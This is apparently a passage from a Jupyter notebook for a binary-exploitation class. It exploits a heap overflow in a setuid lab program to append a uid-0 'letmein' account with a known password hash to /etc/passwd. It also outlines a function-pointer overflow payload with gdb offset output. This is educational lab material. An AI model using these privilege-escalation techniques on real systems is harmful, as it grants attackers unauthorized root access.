CalledProcessError: Command 'b'cat testfile\n'' returned non-zero exit status 1.

## Exploit the heap-overflow flaw in notetaker program
- several clever ways to exploit this type of capability
- append a user to the /etc/passwd file?
- make a backup copy of the file just incase...

In [89]:
%%bash
cp /etc/passwd /tmp/passwd.bkup

In [90]:
%%bash
cat /tmp/passwd.bkup

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/u

## /etc/passwd file format

username:password:userid:groupid:User Info:home folder:default shell
- x : hashed password stored in /etc/shadow file
- the password field can contain hashed password
- Perl crypt() function uses same function used by system to hash password

In [91]:
%%bash
perl -e 'print crypt("password", "AA")'

AA6tQYSfGxd/A

In [92]:
%%bash
perl -e 'print crypt("password", "XX")'

XXq2wKiyI43A2

## goal: genarate a entry that looks like

`letmein:XXq2wKiyI43A2:0:0:me:/root:/bin/bash`

### problem:
- it's hard to generate the exact line ending with /bin/bash
    - the file name /etc/passwd will be automatically attached at the end

### workaround:
- make /etc/passwd a soft link pointing to /bin/bash

In [94]:
%%bash
mkdir /tmp/etc
ln -s /bin/bash /tmp/etc/passwd

In [95]:
%%bash
ls -l /tmp/etc/passwd

lrwxrwxrwx 1 user user 9 Apr 29 13:38 /tmp/etc/passwd -> /bin/bash


### now we've a valid password entry that looks like:

`letmein:XXq2wKiyI43A2:0:0:me:/root:/tmp/etc/passwd`

#### one more thing:
- the value just before /etc/passwd must be 112 bytes long, remember?
- can play with user information column to adjust the length


In [96]:
%%bash
# find the length with empty user info
echo -ne letmein:XXq2wKiyI43A2:0:0::/root:/tmp | wc -c

37


In [97]:
%%bash
echo $((112-37))

75


In [98]:
%%bash
perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp"' | wc -c

112


In [99]:
%%bash
./notetaker.exe $(perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"')

munmap_chunk(): invalid pointer
bash: line 1:  4615 Aborted                 ./notetaker.exe $(perl -e 'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"')


CalledProcessError: Command 'b'./notetaker.exe $(perl -e \'print "letmein:XXq2wKiyI43A2:0:0:" . "A"x75 . ":/root:/tmp/etc/passwd"\')\n'' returned non-zero exit status 134.

In [100]:
%%bash
tail /etc/passwd

colord:x:129:137:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:130:138::/var/lib/geoclue:/usr/sbin/nologin
king-phisher:x:131:139::/var/lib/king-phisher:/usr/sbin/nologin
Debian-gdm:x:132:140:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
user:x:1000:1000:user,12,,:/home/user:/bin/bash
tom:x:1001:1001:tom,123,456,:/home/tom:/bin/bash
jerry:x:1002:1002:jerry,788,454,:/home/jerry:/bin/bash
�  
letmein:XXq2wKiyI43A2:0:0:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:/root:/tmp/etc/passwd


## now login or su letmein with password

## BSS Segment, Function Pointer Overflow
### Game of Chance program
- three different game functions
    - uses a single global function pointer to remember last game played
- uses global struct object in BSS segment to hold plyayer's info
- seteuid multi-user program that stores user's data in /var folder

- compile game_of_chance.c
- change ownership to root:root
- seteuid
- run and play game
- player.name buffer is 100 bytes
- input_name() copies data to player.name until \n
- play_the_game function can take advantage of the overflown function pointer when any game is 
- put the game to background - ctrl+z
- find the difference between player.name address and player.current_game (100)
- return to the suspended program: fg
- enter 5 to change name
- change name to 100As+BBBB+\n
- play the same game and see the DEBUG
- find valid address to overwrite current_game func ptr
- list symbols in object/binary (nm)
    - nm game_of_chance.exe
- automate/simulate the game play
- $ perl -e 'print "1\n10\nn\n5\n" . "A"x100 . "jackpot address in rev order" . "1\n" . "y\n"x10 . 
"n\n5\nJohn Doe\n7"' | ./game_of_chance

```bash
0x41416d41 in ?? ()
gdb-peda$ patts
Registers contain pattern buffer:
EBX+0 found at offset: 132
EBP+0 found at offset: 136
EIP+0 found at offset: 140
Registers point to pattern buffer:
[ESP] --> offset 144 - size ~56
Pattern buffer found at:
0x08051bd7 : offset   22 - size  178 ([heap])
0x08051fc0 : offset    0 - size  200 ([heap])
0xf7c000cd : offset 33208 - size    4 (/usr/lib32/libm-2.31.so)
0xffffc2d0 : offset    0 - size  200 ($sp + -0x90 [-36 dwords])
References to pattern buffer found at:
0xf7de6584 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6588 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de658c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6590 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6594 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de6598 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7de659c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
0xf7e62d4c : 0xffffc2d0 (/usr/lib32/libstdc++.so.6.0.28)
0xffffc2b0 : 0xffffc2d0 ($sp + -0xb0 [-44 dwords])
```